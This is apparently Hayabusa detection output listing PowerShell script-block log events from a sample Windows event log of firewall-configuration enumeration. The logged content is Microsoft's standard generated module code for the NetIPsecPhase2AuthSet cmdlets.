Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPs",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 